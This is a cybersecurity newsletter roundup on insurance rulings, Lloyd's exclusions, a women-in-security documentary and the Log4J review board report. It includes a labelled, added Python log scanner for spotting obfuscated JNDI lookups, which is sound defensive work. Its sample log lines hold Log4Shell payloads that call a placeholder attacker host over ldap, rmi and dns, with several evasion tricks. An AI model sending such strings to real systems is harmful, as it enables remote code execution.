Curated advice, guidance, learning and trends in cybersecurity and privacy, as chosen by our consultants.
Documentary aims to focus on women’s achievements in security
A new documentary aims to shine a spotlight on female achievements in the cybersecurity field. Titled ‘Women in Security’, it will use storytelling techniques and interviews with respected industry professionals and experts. We’re proud to announce that BH Consulting’s Chief Operations Officer, Dr. Valerie Lyons, is one of the film’s 26 contributors. (In a busy month, Valerie has also been chosen by the European Data Protection Board as a member of its Support Pool of Experts.)
The filmmakers hope to inspire the next generation of young women to pursue a career in security, a profession that has historically been male-dominated. The documentary aims to celebrate the achievements of women in cybersecurity, to empower women already working in the field, to accelerate the closing of the gender gap and, in the process, to help address the industry’s labour shortage. The film is currently in production, with an anticipated release date of March 2023. There’s more information on the documentary’s LinkedIn page.
Meanwhile, for those interested in privacy and data protection, there’s an excellent post about building a career in that field. Emerald de Leeuw, a longstanding privacy specialist, has written the first post in a planned series. In it, she outlines how to get started in the field, whether you need to be a lawyer, and what it’s like to work as a privacy consultant.
As demand for cyber risk insurance increases, two recent developments could have policyholders scrambling to check their cover. In the United States, a judge dismissed a suit by a company whose insurer had refused to pay the full losses from a business email compromise. The company sought $600,000 to cover its losses, but the social engineering fraud section of its policy had a cap of $100,000. In effect, the judge ruled that social engineering and computer fraud are not the same thing, so the loss fell under the capped social engineering cover. The practical lesson is to read the definitions and sub-limits in your own policy: a BEC loss is likely to be classed as social engineering, and that sub-limit can be a fraction of the headline figure. Independent research like the Verizon Data Breach Investigations Report consistently shows that a high proportion of breaches involve a human element. If other judges follow this precedent, insurers could become less likely to pay in cases like this.
Meanwhile, Lloyd’s of London will require its syndicates to exclude some state-backed cyberattacks from standalone cyber policies from March next year. Cybersecurity Dive said the move had been expected for some time. Dark Reading said it should prompt businesses to reevaluate their cyber risk policies. Brian Honan hoped this could lead to “more honest press releases and breach notifications where companies won’t automatically leap to point the blame at ‘nation state sophisticated attackers’, but rather admit they were victims of ordinary criminal behaviour.” And the cyber insurance market keeps growing. Fitch Ratings estimates annual cyber risk premiums are between $8 billion and $10 billion today. By 2025, it expects them to grow to more than $22 billion.
The Log4J ‘gift’ will keep giving
Cast your mind back to December of last year. For anyone working in information security, the month was defined by the discovery of a critical flaw in Apache’s Log4J logging library, a component embedded in hundreds of millions of devices. Because Log4J would resolve attacker-supplied lookup strings found in logged data, the flaw could be triggered remotely and had the potential to enable system compromise, data theft, or ransomware infections. Its scope quickly earned it the title of “the most significant vulnerability in the last decade”. Now the next ten years aren’t looking too promising either. The Cyber Safety Review Board, established earlier this year under an executive order from President Joe Biden, found that Log4J risks are endemic and will persist for a decade or more.
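One practical consequence of that endemic risk is that defenders still need to spot exploitation attempts in their own logs, and attackers routinely disguise the lookup string to slip past naive matching. The following Python example is added here and is not part of the original newsletter or of the CSRB report. It normalises the common obfuscations of the `${jndi:...}` lookup (URL-encoding, `${lower:}`/`${upper:}` wrappers around single letters, and the `${...:-x}` default-value trick) before matching, then runs over a few constructed web-server log lines. The log lines, IP addresses and `attacker.example` hostnames are invented for illustration.

```python
import re
import urllib.parse
from typing import List, Optional, Tuple

# Common ways the "${jndi:" lookup string has been disguised in requests:
#   ${${lower:j}ndi:ldap://...}          case-conversion lookups around single letters
#   ${${::-j}${::-n}${::-d}${::-i}:...}  empty lookup with a "-" default value
#   ${${env:NOPE:-j}ndi:...}             default value of a variable that does not exist
#   %24%7Bjndi%3A...                     URL-encoding of the whole payload
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]*)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Peel off URL-encoding and lookup obfuscation until the text stops changing.

    Innermost lookups are resolved first, so nested tricks such as
    ${${lower:${lower:j}}ndi:...} collapse after a few rounds. The round
    limit keeps pathological input from looping forever.
    """
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_jndi_scheme(text: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) if a lookup is present, else None."""
    match = _JNDI.search(normalize(text))
    return match.group(1).lower() if match else None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, client_ip, scheme) for every line carrying a JNDI lookup.

    The whole line is checked, not just the request path: User-Agent, Referer
    and similar headers were abused because vulnerable apps logged them verbatim.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = find_jndi_scheme(line)
        if scheme is not None:
            client_ip = line.split(" ", 1)[0]  # first field of combined log format
            hits.append((number, client_ip, scheme))
    return hits


# Constructed combined-log-format lines for demonstration; IPs and hosts are invented.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:rmi}://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:23 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:27 +0000] '
    '"GET /?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for number, ip, scheme in scan_log(SAMPLE_LOG):
        print(f"line {number}: {ip} sent a {scheme} JNDI lookup")
```

Matching on the normalised text rather than the raw line is the point: a rule that only looks for the literal string `${jndi:` misses three of the four malicious lines above. The scheme is returned because it is useful triage context (an `ldap` or `rmi` lookup is an attempt to load a remote class; `dns` is usually reconnaissance to see whether the target resolves attacker-controlled names).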
The board’s 52-page report goes back over the event in detail and includes recommendations to help mitigate the risks. As Brian Honan noted, this follows an established pattern in security. “As we are still having breaches due to SQL injection and other vulnerabilities identified decades ago, I have no doubt that we will still be dealing with recently discovered vulnerabilities for decades to come, and yes, I won’t be surprised to still see SQL injection attacks over the coming decades. Security engineering needs to become the default for all systems and applications from their very beginning and not something added on as a nice-to-have or to keep regulators happy.”
Links we liked
LastPass’ disclosure of a security incident is a case study on clarity and transparency. MORE
For your incident response planning: questions that always get asked in a crisis. MORE
Ireland’s NCSC has published guidance on securing operational technology. MORE
Lessons learned from real-life incident information sharing. MORE
An experiment found that a ‘checklist’ approach to security isn’t effective. MORE
US-centric but still useful: four myths inhibiting the search for cybersecurity talent. MORE
The Federal Trade Commission is sceptical of apps that claim to anonymise data. MORE
Researchers uncloak infrastructure used by ransomware groups. MORE
Seven open-source malware analysis tools for you to try. MORE
Overcoming obstacles to passwordless authentication. MORE
Have you signed up to our monthly newsletter? Every month we send out the latest cybersecurity and data protection news, trends and advice from around the globe. Sign up here